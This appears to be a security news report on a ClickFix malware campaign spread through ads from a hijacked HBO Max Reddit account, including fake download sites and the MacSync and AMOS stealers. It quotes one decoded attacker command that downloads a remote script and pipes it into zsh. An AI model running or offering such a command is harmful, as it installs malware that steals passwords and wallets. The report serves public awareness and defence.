Cybercriminals have breached the official Reddit account of HBO Max, utilizing it to disseminate harmful advertisements that initiated ClickFix attacks, aimed at infecting both Windows and macOS devices with malware designed to steal information.
Security analysts from Hudson Rock and ADAMnetworks investigated the operation and reported that the verified Reddit account u/hbomax was compromised, leading to the posting of 108 malicious ads over a span of approximately 48 hours.
The advertisements employed a social engineering tactic known as ClickFix, which deceives users into copying and pasting harmful commands into Windows Run, PowerShell, or macOS Terminal under the guise of fixing an error, verifying a CAPTCHA, or installing legitimate software.
This method of attack has gained traction among cybercriminals, as it allows victims to execute the malicious commands themselves using authentic operating system tools, potentially evading some browser and security measures designed to identify malware downloads.
While some ads impersonated the HBO Max service, others promoted fraudulent AI tools, developer software, and macOS utilities.
Hudson Rock and ADAMnetworks have connected this attack to a broader initiative they refer to as PasteSwitch, which targets both Windows and macOS platforms and has been utilized to distribute information stealers, loaders, cryptocurrency clippers, and counterfeit cryptocurrency wallet applications.
The researchers explain that PasteSwitch pertains to the attackers’ use of commands that victims are tricked into pasting into their systems, while the attackers’ backend alternates between campaigns, platforms, payloads, and methods of cryptocurrency theft based on the visitor.
BleepingComputer reached out to HBO and Warner Bros. Discovery for comments regarding the incident but has yet to receive a reply.
Fake HBO Max Application Distributes Malware
The campaign was first identified when a Reddit user noticed an advertisement from the verified HBO Max account promoting what seemed to be a legitimate HBO Max application for macOS.
“I was browsing Reddit and came across an ad authored by u/hbomax – it promoted a macOS HBO Max app that I hadn’t heard of and was curious about. The user is verified and has posted frequently in the official HBO Max subreddits,” the user cautioned.
“The advertisement directs you to hbomaxx[.]us, which appears somewhat credible, featuring a join button/download. Clicking these leads to the classic infostealer/clickfix prompt to paste this command to download. Upon checking, this downloads an executable with additional capabilities for account compromise (all done in a full sandbox – inspecting the output only, not executing anything).”
After engaging with the advertisement, users were redirected to a convincing counterfeit HBO Max website that claimed to provide the application for download.
One of the fraudulent HBO Max sites involved in the campaign was hbomaxx[.]us. However, clicking the download button did not yield an application but instead presented instructions for visitors to open Terminal and paste a command to install the software.
One of the macOS commands observed by BleepingComputer in this attack utilized Base64 encoding to obscure the command it executed. Once decoded, it revealed the following command: export _watch_v2=97d9d8dc;curl -sL “https://ember-bridge[.]com/curl/a44a37519au/setup.sh”| zsh
Hudson Rock identified ember-bridge[.]com as infrastructure used in September for malware delivery in the PasteSwitch operation.
One malware variant involved in this attack is MacSync, which Hudson Rock states steals browser credentials, Firefox profiles, Telegram data, Apple Notes, and macOS passwords.
Another attack chain deployed “AMOS helper,” which establishes persistence through a directory named .com.apple.accountsd. This malware can then register infected systems with servers controlled by attackers to receive further instructions.
The campaign has also circulated counterfeit Ledger, Trezor Suite, and Exodus cryptocurrency wallet applications aimed at stealing victims’ wallet recovery phrases.
On Windows systems, PasteSwitch has been observed.
Source: Original article
